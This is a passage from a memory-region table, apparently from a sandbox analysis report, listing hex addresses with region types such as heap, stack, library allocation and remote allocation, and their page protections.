|
page read and write
|
||
1AAE4000
|
heap
|
page read and write
|
||
229000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
1AD53000
|
heap
|
page read and write
|
||
290000
|
heap
|
page read and write
|
||
32D9000
|
heap
|
page read and write
|
||
470F000
|
heap
|
page read and write
|
||
1C79C000
|
stack
|
page read and write
|
||
52A000
|
heap
|
page read and write
|
||
3D60000
|
trusted library allocation
|
page read and write
|
||
2F2C000
|
heap
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
3CA000
|
heap
|
page read and write
|
||
4166000
|
heap
|
page read and write
|
||
34B000
|
heap
|
page read and write
|
||
1F60000
|
heap
|
page execute and read and write
|
||
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
477E000
|
heap
|
page read and write
|
||
535000
|
heap
|
page read and write
|
||
2789000
|
trusted library allocation
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
22FF000
|
stack
|
page read and write
|
||
5C0000
|
trusted library allocation
|
page execute read
|
||
59E000
|
heap
|
page read and write
|
||
1EE6000
|
heap
|
page read and write
|
||
23E8000
|
trusted library allocation
|
page read and write
|
||
27D000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
23FA000
|
trusted library allocation
|
page read and write
|
||
184000
|
heap
|
page read and write
|
||
34B0000
|
heap
|
page read and write
|
||
470F000
|
heap
|
page read and write
|
||
4A34000
|
heap
|
page read and write
|
||
3B0000
|
trusted library allocation
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
34CA000
|
stack
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
181000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
32C000
|
stack
|
page read and write
|
||
1ABDF000
|
stack
|
page read and write
|
||
3990000
|
trusted library allocation
|
page read and write
|
||
1C2CF000
|
heap
|
page read and write
|
||
73E000
|
stack
|
page read and write
|
||
4E8000
|
heap
|
page read and write
|
||
33AF000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
477B000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
12291000
|
trusted library allocation
|
page read and write
|
||
439D000
|
heap
|
page read and write
|
||
1AAF2000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
52D000
|
heap
|
page read and write
|
||
2380000
|
heap
|
page read and write
|
||
7FE89A98000
|
trusted library allocation
|
page read and write
|
||
1B35B000
|
heap
|
page read and write
|
||
4714000
|
heap
|
page read and write
|
||
18C000
|
heap
|
page read and write
|
||
1AC80000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
1BE000
|
heap
|
page read and write
|
||
228F000
|
stack
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
1C488000
|
heap
|
page read and write
|
||
21B1000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
7FE89C44000
|
trusted library allocation
|
page read and write
|
||
4757000
|
heap
|
page read and write
|
||
1B535000
|
heap
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
278F000
|
trusted library allocation
|
page read and write
|
||
453D000
|
heap
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
2794000
|
trusted library allocation
|
page read and write
|
||
4389000
|
heap
|
page read and write
|
||
7FE89893000
|
trusted library allocation
|
page execute and read and write
|
||
2B4000
|
heap
|
page read and write
|
||
477F000
|
heap
|
page read and write
|
||
224E000
|
stack
|
page read and write | page guard
|
||
1B38B000
|
heap
|
page read and write
|
||
3F6000
|
heap
|
page read and write
|
||
1296E000
|
trusted library allocation
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
2AB000
|
heap
|
page read and write
|
||
152000
|
heap
|
page read and write
|
||
1B329000
|
heap
|
page read and write
|
||
737000
|
heap
|
page read and write
|
||
378000
|
heap
|
page read and write
|
||
2BF000
|
heap
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
4A65000
|
heap
|
page read and write
|
||
1A30F000
|
stack
|
page read and write
|
||
41E000
|
heap
|
page read and write
|
||
279B000
|
trusted library allocation
|
page read and write
|
||
1C6B0000
|
heap
|
page read and write
|
||
1CF69000
|
trusted library section
|
page read and write
|
||
1C670000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
40E000
|
heap
|
page read and write
|
||
260000
|
trusted library allocation
|
page read and write
|
||
5FD000
|
stack
|
page read and write
|
||
4860000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
1CE8B000
|
trusted library section
|
page read and write
|
||
37A4000
|
heap
|
page read and write
|
||
46C2000
|
heap
|
page read and write
|
||
7FE89A70000
|
trusted library allocation
|
page read and write
|
||
7FE89B65000
|
trusted library allocation
|
page read and write
|
||
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
1CFDA000
|
trusted library section
|
page read and write
|
||
1CE2B000
|
trusted library section
|
page read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
3B20000
|
heap
|
page read and write
|
||
4861000
|
heap
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
23F6000
|
trusted library allocation
|
page read and write
|
||
1D00C000
|
trusted library section
|
page read and write
|
||
11F000
|
heap
|
page read and write
|
||
3007000
|
heap
|
page read and write
|
||
5A5000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
564000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
43AB000
|
heap
|
page read and write
|
||
25E000
|
heap
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
4164000
|
heap
|
page read and write
|
||
91E000
|
heap
|
page read and write
|
||
59E000
|
heap
|
page read and write
|
||
11A000
|
heap
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
3E000
|
heap
|
page read and write
|
||
4058000
|
heap
|
page read and write
|
||
2795000
|
trusted library allocation
|
page read and write
|
||
837000
|
heap
|
page read and write
|
||
1CA0F000
|
stack
|
page read and write
|
||
1A838000
|
heap
|
page execute and read and write
|
||
1AA80000
|
heap
|
page read and write
|
||
1ABEB000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
140000
|
trusted library allocation
|
page read and write
|
||
2EAE000
|
stack
|
page read and write
|
||
2A00000
|
trusted library allocation
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
12A4E000
|
trusted library allocation
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
21F0000
|
trusted library allocation
|
page read and write
|
||
3A8F000
|
trusted library allocation
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
479C000
|
heap
|
page read and write
|
||
446F000
|
heap
|
page read and write
|
||
4A3B000
|
heap
|
page read and write
|
||
1B2DB000
|
stack
|
page read and write
|
||
533000
|
heap
|
page read and write
|
||
3498000
|
trusted library allocation
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
2E4000
|
heap
|
page read and write
|
||
7FE89956000
|
trusted library allocation
|
page read and write
|
||
2CF000
|
heap
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
1CE7D000
|
trusted library section
|
page read and write
|
||
17F000
|
trusted library allocation
|
page read and write
|
||
342000
|
heap
|
page read and write
|
||
1A799000
|
stack
|
page read and write
|
||
1CE99000
|
trusted library section
|
page read and write
|
||
20D1000
|
trusted library allocation
|
page read and write
|
||
3413000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
7FE89A42000
|
trusted library allocation
|
page read and write
|
||
7FE89976000
|
trusted library allocation
|
page execute and read and write
|
||
453E000
|
heap
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
2C3000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
1CE66000
|
trusted library section
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
1CCF1000
|
trusted library section
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
47A1000
|
heap
|
page read and write
|
||
21E6000
|
trusted library allocation
|
page read and write
|
||
1C2FB000
|
heap
|
page read and write
|
||
4392000
|
heap
|
page read and write
|
||
1AAB9000
|
heap
|
page read and write
|
||
3006000
|
heap
|
page read and write
|
||
124D1000
|
trusted library allocation
|
page read and write
|
||
1CE27000
|
trusted library section
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
4A68000
|
heap
|
page read and write
|
||
1F10000
|
heap
|
page read and write
|
||
46C1000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
23A1000
|
heap
|
page read and write
|
||
3B74000
|
trusted library allocation
|
page read and write
|
||
4A63000
|
heap
|
page read and write
|
||
21EF000
|
trusted library allocation
|
page read and write
|
||
1CFF1000
|
trusted library section
|
page read and write
|
||
3F76000
|
heap
|
page read and write
|
||
7FE89894000
|
trusted library allocation
|
page read and write
|
||
26EE000
|
stack
|
page read and write
|
||
124E1000
|
trusted library allocation
|
page read and write
|
||
1CFEF000
|
trusted library section
|
page read and write
|
||
1C2F2000
|
heap
|
page read and write
|
||
1D006000
|
trusted library section
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
5AA000
|
heap
|
page read and write
|
||
23FA000
|
trusted library allocation
|
page read and write
|
||
1CB3F000
|
stack
|
page read and write
|
||
2D5000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
1CD77000
|
trusted library section
|
page read and write
|
||
45A0000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
33AA000
|
heap
|
page read and write
|
||
7FE89BF1000
|
trusted library allocation
|
page read and write
|
||
4470000
|
heap
|
page read and write
|
||
1B4EB000
|
heap
|
page read and write
|
||
1C459000
|
heap
|
page read and write
|
||
3FF000
|
trusted library allocation
|
page read and write
|
||
1EF0000
|
direct allocation
|
page read and write
|
||
2136000
|
heap
|
page read and write
|
||
1DC0000
|
heap
|
page read and write
|
||
21F6000
|
trusted library allocation
|
page read and write
|
||
4A07000
|
heap
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
23F4000
|
trusted library allocation
|
page read and write
|
||
3302000
|
heap
|
page read and write
|
||
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
7FE89A98000
|
trusted library allocation
|
page read and write
|
||
1A234000
|
heap
|
page read and write
|
||
1C0000
|
trusted library allocation
|
page read and write
|
||
D5D000
|
stack
|
page read and write
|
||
21E5000
|
trusted library allocation
|
page read and write
|
||
46C1000
|
heap
|
page read and write
|
||
1C2ED000
|
heap
|
page read and write
|
||
1AD72000
|
heap
|
page read and write
|
||
4778000
|
heap
|
page read and write
|
||
338B000
|
heap
|
page read and write
|
||
2AF000
|
heap
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
6BE000
|
stack
|
page read and write
|
||
3FD000
|
heap
|
page read and write
|
||
265000
|
heap
|
page read and write
|
||
453E000
|
heap
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
31F000
|
heap
|
page read and write
|
||
86C000
|
heap
|
page read and write
|
||
10A000
|
heap
|
page read and write
|
||
1E10000
|
direct allocation
|
page read and write
|
||
1CD2D000
|
trusted library section
|
page read and write
|
||
2920000
|
trusted library allocation
|
page execute
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
1E37000
|
direct allocation
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
27D5000
|
trusted library allocation
|
page read and write
|
||
276B000
|
trusted library allocation
|
page read and write
|
||
471000
|
remote allocation
|
page execute and read and write
|
||
1C19C000
|
heap
|
page read and write
|
||
479C000
|
heap
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
3B70000
|
trusted library allocation
|
page read and write
|
||
4100000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
3B10000
|
trusted library allocation
|
page read and write
|
||
1A818000
|
stack
|
page read and write
|
||
7FE89946000
|
trusted library allocation
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
106000
|
heap
|
page read and write
|
||
1CDE6000
|
trusted library section
|
page read and write
|
||
1CCB0000
|
trusted library section
|
page read and write
|
||
4163000
|
heap
|
page read and write
|
||
1F2F000
|
stack
|
page read and write
|
||
1B490000
|
heap
|
page read and write
|
||
4B1000
|
heap
|
page read and write
|
||
60E000
|
heap
|
page read and write
|
||
49D9000
|
heap
|
page read and write
|
||
220000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
trusted library allocation
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
46EB000
|
heap
|
page read and write
|
||
33A7000
|
heap
|
page read and write
|
||
1CE39000
|
trusted library section
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
3C00000
|
heap
|
page read and write
|
||
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
12C31000
|
trusted library allocation
|
page read and write
|
||
47A1000
|
heap
|
page read and write
|
||
23EE000
|
trusted library allocation
|
page read and write
|
||
1A5AE000
|
heap
|
page execute and read and write
|
||
1F30000
|
direct allocation
|
page read and write
|
||
149000
|
heap
|
page read and write
|
||
40F000
|
heap
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
3302000
|
heap
|
page read and write
|
||
2D90000
|
trusted library allocation
|
page read and write
|
||
2C8000
|
stack
|
page read and write
|
||
160000
|
trusted library allocation
|
page read and write
|
||
7FE89BAF000
|
trusted library allocation
|
page read and write
|
||
2DF000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
1CCFD000
|
trusted library section
|
page read and write
|
||
1FB0000
|
heap
|
page execute and read and write
|
||
2750000
|
remote allocation
|
page read and write
|
||
1A70C000
|
heap
|
page read and write
|
||
4A67000
|
heap
|
page read and write
|
||
47A3000
|
heap
|
page read and write
|
||
125D1000
|
trusted library allocation
|
page read and write
|
||
25EF000
|
stack
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
2FE7000
|
heap
|
page read and write
|
||
4EE000
|
heap
|
page read and write
|
||
7FE89A74000
|
trusted library allocation
|
page read and write
|
||
3FF000
|
heap
|
page read and write
|
||
2110000
|
heap
|
page execute and read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
216000
|
stack
|
page read and write
|
||
2F71000
|
heap
|
page read and write
|
||
1A679000
|
stack
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
47B000
|
heap
|
page read and write
|
||
47A5000
|
heap
|
page read and write
|
||
3140000
|
trusted library allocation
|
page read and write
|
||
21F2000
|
trusted library allocation
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
3D60000
|
trusted library allocation
|
page read and write
|
||
1D05C000
|
trusted library section
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
30E000
|
heap
|
page read and write
|
||
1C30E000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
1CCAA000
|
trusted library section
|
page read and write
|
||
3B5000
|
heap
|
page read and write
|
||
2F2C000
|
heap
|
page read and write
|
||
1B05F000
|
stack
|
page read and write
|
||
37F000
|
heap
|
page read and write
|
||
7FE89A4C000
|
trusted library allocation
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
2AD000
|
heap
|
page read and write
|
||
40F000
|
heap
|
page read and write
|
||
4711000
|
heap
|
page read and write
|
||
24EE000
|
trusted library allocation
|
page read and write
|
||
1B0000
|
trusted library allocation
|
page read and write
|
||
2FF5000
|
heap
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
1CDDC000
|
trusted library section
|
page read and write
|
||
4757000
|
heap
|
page read and write
|
||
41F000
|
heap
|
page read and write
|
||
1DC000
|
stack
|
page read and write
|
||
5A8000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
1AD74000
|
heap
|
page read and write
|
||
4CE000
|
heap
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page read and write
|
||
39F0000
|
trusted library allocation
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
3370000
|
trusted library allocation
|
page read and write
|
||
1A29C000
|
stack
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
276F000
|
trusted library allocation
|
page read and write
|
||
31C000
|
heap
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
1B3B0000
|
heap
|
page read and write
|
||
4A3E000
|
heap
|
page read and write
|
||
4532000
|
heap
|
page read and write
|
||
46C0000
|
heap
|
page read and write
|
||
440000
|
heap
|
page read and write
|
||
1C3B0000
|
heap
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
3A6000
|
heap
|
page read and write
|
||
1CEBF000
|
trusted library section
|
page read and write
|
||
7FE89A43000
|
trusted library allocation
|
page read and write
|
||
1CD1A000
|
trusted library section
|
page read and write
|
||
24D000
|
heap
|
page read and write
|
||
22B0000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
4617000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
7FE89A72000
|
trusted library allocation
|
page read and write
|
||
3F8D000
|
heap
|
page read and write
|
||
257000
|
heap
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89A30000
|
trusted library allocation
|
page read and write
|
||
46C4000
|
heap
|
page read and write
|
||
1C2C5000
|
heap
|
page read and write
|
||
3A89000
|
trusted library allocation
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
2DE000
|
stack
|
page read and write
|
||
1ACC4000
|
heap
|
page read and write
|
||
1B2B0000
|
heap
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
173000
|
heap
|
page read and write
|
||
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
2E4000
|
heap
|
page read and write
|
||
165000
|
heap
|
page read and write
|
||
2FD5000
|
heap
|
page read and write
|
||
451000
|
heap
|
page read and write
|
||
1C570000
|
heap
|
page read and write
|
||
389A000
|
trusted library allocation
|
page read and write
|
||
1DE000
|
stack
|
page read and write
|
||
1ACB0000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
1AA0B000
|
stack
|
page read and write
|
||
25B000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
1C1EB000
|
heap
|
page read and write
|
||
4EF000
|
heap
|
page read and write
|
||
1A720000
|
heap
|
page execute and read and write
|
||
2F8A000
|
heap
|
page read and write
|
||
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
130000
|
heap
|
page read and write
|
||
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
29A0000
|
trusted library allocation
|
page execute
|
||
10000
|
heap
|
page read and write
|
||
11E000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
1AAE3000
|
heap
|
page read and write
|
||
32E1000
|
heap
|
page read and write
|
||
1DD0000
|
heap
|
page read and write
|
||
297B000
|
trusted library allocation
|
page read and write
|
||
23F0000
|
trusted library allocation
|
page read and write
|
||
49CF000
|
heap
|
page read and write
|
||
32BC000
|
heap
|
page read and write
|
||
21E3000
|
trusted library allocation
|
page read and write
|
||
2B0000
|
heap
|
page read and write
|
||
1AD5E000
|
stack
|
page read and write
|
||
3F5000
|
heap
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
1A7EE000
|
heap
|
page execute and read and write
|
||
47A1000
|
heap
|
page read and write
|
||
37A000
|
heap
|
page read and write
|
||
4711000
|
heap
|
page read and write
|
||
1C1D6000
|
heap
|
page read and write
|
||
284F000
|
stack
|
page read and write
|
||
22DB000
|
trusted library allocation
|
page read and write
|
||
1B2DF000
|
stack
|
page read and write
|
||
1CDB6000
|
trusted library section
|
page read and write
|
||
1A7B8000
|
heap
|
page execute and read and write
|
||
200000
|
heap
|
page read and write
|
||
3B8E000
|
heap
|
page read and write
|
||
47A3000
|
heap
|
page read and write
|
||
7FE899B0000
|
trusted library allocation
|
page execute and read and write
|
||
4714000
|
heap
|
page read and write
|
||
137000
|
heap
|
page read and write
|
||
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
4A5B000
|
heap
|
page read and write
|
||
4B7000
|
heap
|
page read and write
|
||
1CEFB000
|
trusted library section
|
page read and write
|
||
2880000
|
trusted library allocation
|
page read and write
|
||
50D000
|
heap
|
page read and write
|
||
C11000
|
heap
|
page read and write
|
||
1A574000
|
heap
|
page execute and read and write
|
||
47A1000
|
heap
|
page read and write
|
||
1C8EF000
|
stack
|
page read and write
|
||
23F2000
|
trusted library allocation
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
3940000
|
trusted library allocation
|
page read and write
|
||
7A7000
|
heap
|
page read and write
|
||
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
1C32F000
|
heap
|
page read and write
|
||
174000
|
heap
|
page read and write
|
||
1AD1A000
|
heap
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
377000
|
heap
|
page read and write
|
||
3B24000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
338B000
|
heap
|
page read and write
|
||
2A4000
|
heap
|
page read and write
|
||
1E30000
|
heap
|
page read and write
|
||
1A52D000
|
stack
|
page read and write
|
||
152000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
23A0000
|
heap
|
page read and write
|
||
21ED000
|
trusted library allocation
|
page read and write
|
||
234B000
|
trusted library allocation
|
page read and write
|
||
258B000
|
trusted library allocation
|
page read and write
|
||
2B6000
|
heap
|
page read and write
|
||
273D000
|
trusted library allocation
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
1B62B000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
18C000
|
heap
|
page read and write
|
||
3AB0000
|
heap
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
30E000
|
stack
|
page read and write
|
||
43AC000
|
heap
|
page read and write
|
||
1B56B000
|
heap
|
page read and write
|
||
4EB000
|
heap
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1A3000
|
heap
|
page read and write
|
||
125C1000
|
trusted library allocation
|
page read and write
|
||
4771000
|
heap
|
page read and write
|
||
28EF000
|
stack
|
page read and write
|
||
1CE91000
|
trusted library section
|
page read and write
|
||
2528000
|
trusted library allocation
|
page read and write
|
||
23F5000
|
trusted library allocation
|
page read and write
|
||
1AAEC000
|
heap
|
page read and write
|
||
46DB000
|
heap
|
page read and write
|
||
3A5D000
|
trusted library allocation
|
page read and write
|
||
22DF000
|
stack
|
page read and write
|
||
27C4000
|
trusted library allocation
|
page read and write
|
||
13F11000
|
trusted library allocation
|
page read and write
|
||
7EF000
|
heap
|
page read and write
|
||
2DB000
|
heap
|
page read and write
|
||
29D000
|
heap
|
page read and write
|
||
1C9000
|
heap
|
page read and write
|
||
242000
|
stack
|
page read and write
|
||
1C442000
|
heap
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
3CE000
|
stack
|
page read and write
|
||
1C56000
|
heap
|
page read and write
|
||
109000
|
heap
|
page read and write
|
||
1CE3000
|
direct allocation
|
page read and write
|
||
1B2AF000
|
stack
|
page read and write
|
||
4661000
|
heap
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
1D60000
|
trusted library allocation
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
334000
|
heap
|
page read and write
|
||
3690000
|
trusted library allocation
|
page read and write
|
||
4830000
|
heap
|
page read and write
|
||
336C000
|
heap
|
page read and write
|
||
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
4F5000
|
heap
|
page read and write
|
||
1BE0000
|
heap
|
page read and write
|
||
359000
|
heap
|
page read and write
|
||
176000
|
heap
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page read and write
|
||
4919000
|
heap
|
page read and write
|
||
1CE2F000
|
trusted library section
|
page read and write
|
||
448000
|
heap
|
page read and write
|
||
3E3000
|
heap
|
page read and write
|
||
3D9000
|
heap
|
page read and write
|
||
479000
|
heap
|
page read and write
|
||
26A3000
|
trusted library allocation
|
page read and write
|
||
249000
|
heap
|
page read and write
|
||
299000
|
heap
|
page read and write
|
||
1C431000
|
heap
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
518000
|
heap
|
page read and write
|
||
7FE89956000
|
trusted library allocation
|
page execute and read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
1CE33000
|
trusted library section
|
page read and write
|
||
7DC000
|
heap
|
page read and write
|
||
12CAA000
|
trusted library allocation
|
page read and write
|
||
23B3000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
1CF67000
|
trusted library section
|
page read and write
|
||
1A749000
|
stack
|
page read and write
|
||
1CE06000
|
trusted library section
|
page read and write
|
||
1A21E000
|
stack
|
page read and write
|
||
4A5C000
|
heap
|
page read and write
|
||
4A70000
|
heap
|
page read and write
|
||
2C0E000
|
stack
|
page read and write
|
||
4917000
|
heap
|
page read and write
|
||
5AC000
|
heap
|
page read and write
|
||
1B4000
|
heap
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page execute and read and write
|
||
46DB000
|
heap
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
1D00A000
|
trusted library section
|
page read and write
|
||
7FE89C14000
|
trusted library allocation
|
page read and write
|
||
7FE89946000
|
trusted library allocation
|
page read and write
|
||
2B4000
|
heap
|
page read and write
|
||
314000
|
heap
|
page read and write
|
||
2791000
|
trusted library allocation
|
page read and write
|
||
25E000
|
heap
|
page read and write
|
||
31A000
|
heap
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
25C000
|
heap
|
page read and write
|
||
11E000
|
heap
|
page read and write
|
||
234000
|
stack
|
page read and write
|
||
453C000
|
heap
|
page read and write
|
||
4750000
|
heap
|
page read and write
|
||
49CF000
|
heap
|
page read and write
|
||
1DC4000
|
heap
|
page read and write
|
||
279A000
|
trusted library allocation
|
page read and write
|
||
28F000
|
heap
|
page read and write
|
||
4746000
|
heap
|
page read and write
|
||
3F2000
|
heap
|
page read and write
|
||
1ED0000
|
direct allocation
|
page read and write
|
||
1B4B5000
|
heap
|
page read and write
|
||
25C000
|
stack
|
page read and write
|
||
3A7D000
|
trusted library allocation
|
page read and write
|
||
141ED000
|
trusted library allocation
|
page read and write
|
||
1A62F000
|
stack
|
page read and write
|
||
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
7FE89920000
|
trusted library allocation
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
4057000
|
heap
|
page read and write
|
||
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
3B30000
|
trusted library allocation
|
page read and write
|
||
5AA000
|
heap
|
page read and write
|
||
47E000
|
heap
|
page read and write
|
||
137000
|
heap
|
page read and write
|
||
1DC5000
|
heap
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
1CFE5000
|
trusted library section
|
page read and write
|
||
554000
|
heap
|
page read and write
|
||
441B000
|
heap
|
page read and write
|
||
3A94000
|
trusted library allocation
|
page read and write
|
||
535000
|
heap
|
page read and write
|
||
182000
|
heap
|
page read and write
|
||
508000
|
heap
|
page read and write
|
||
5C0000
|
heap
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
4776000
|
heap
|
page read and write
|
||
4CE000
|
heap
|
page read and write
|
||
4A6F000
|
heap
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
2BC0000
|
trusted library allocation
|
page read and write
|
||
122C1000
|
trusted library allocation
|
page read and write
|
||
515000
|
heap
|
page read and write
|
||
1C130000
|
heap
|
page read and write
|
||
4755000
|
heap
|
page read and write
|
||
380E000
|
heap
|
